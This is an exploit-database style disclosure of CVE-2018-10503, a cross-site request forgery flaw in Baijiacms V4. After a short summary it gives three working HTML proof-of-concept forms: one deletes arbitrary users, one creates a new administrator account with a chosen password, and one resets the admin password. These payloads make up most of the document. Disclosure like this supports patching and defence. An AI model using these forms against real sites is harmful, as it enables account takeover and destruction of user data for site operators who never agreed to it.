Baijiacms V4 v4_1_4_20170105 CVE-2018-10503 – CSRF

Authors:monburan            Risk:High

CVE:CVE-2018-10503         0day:Cross-site request forgery 

0day -id:0DAY-176114        Date:2018-04-28

Summary

An issue was discovered in index.php in baijiacms V4 v4_1_4_20170105. CSRF allows adding an administrator account via op=edituser, changing the administrator password via op=changepwd, or deleting an account via op=deleteuser.

POC

del any user

<html>
<body>
    <script>
        history.pushState('', '', '/')
    </script>
    <form action="http://localhost/index.php">
        <input type="hidden" name="mod" value="site" />
        <input type="hidden" name="op" value="deleteuser" />
        <input type="hidden" name="id" value="3" />
        <!--del user with id -->
        <input type="hidden" name="act" value="manager" />
        <input type="hidden" name="do" value="user" />
        <input type="hidden" name="beid" value="1" />
        <input type="submit" value="Submit request" />
    </form>
</body>
</html>
add a user(admin)
<html>
<body>
    <script>
        history.pushState('', '', '/')
    </script>
    <form action="http://localhost/index.php?mod=site&op=edituser&act=manager&do=user&beid=1" method="POST">
        <input type="hidden" name="id" value="" />
        <input type="hidden" name="is&#95;admin" value="1" />
        <!-- add a admin -->
        <input type="hidden" name="store" value="0" />
        <input type="hidden" name="username" value="tester1" />
        <input type="hidden" name="newpassword" value="123456" />
        <input type="hidden" name="confirmpassword" value="123456" />
        <input type="hidden" name="submit" value="%E6%8F%90%E4%BA%A4" />
        <input type="submit" value="Submit request" />
    </form>
</body>
</html>

change admin password

<html>
<body>
    <script>
        history.pushState('', '', '/')
    </script>
    <form action="http://localhost/index.php?mod=site&op=changepwd&id=1&act=manager&do=user&beid=1" method="POST">
        <input type="hidden" name="username" value="admin" />
        <!--only use username -->
        <input type="hidden" name="newpassword" value="12345678" />
        <input type="hidden" name="confirmpassword" value="12345678" />
        <input type="hidden" name="submit" value="%E6%8F%90%E4%BA%A4;" />
        <input type="submit" value="Submit request" />
    </form>
</body>
</html>

Leave a Reply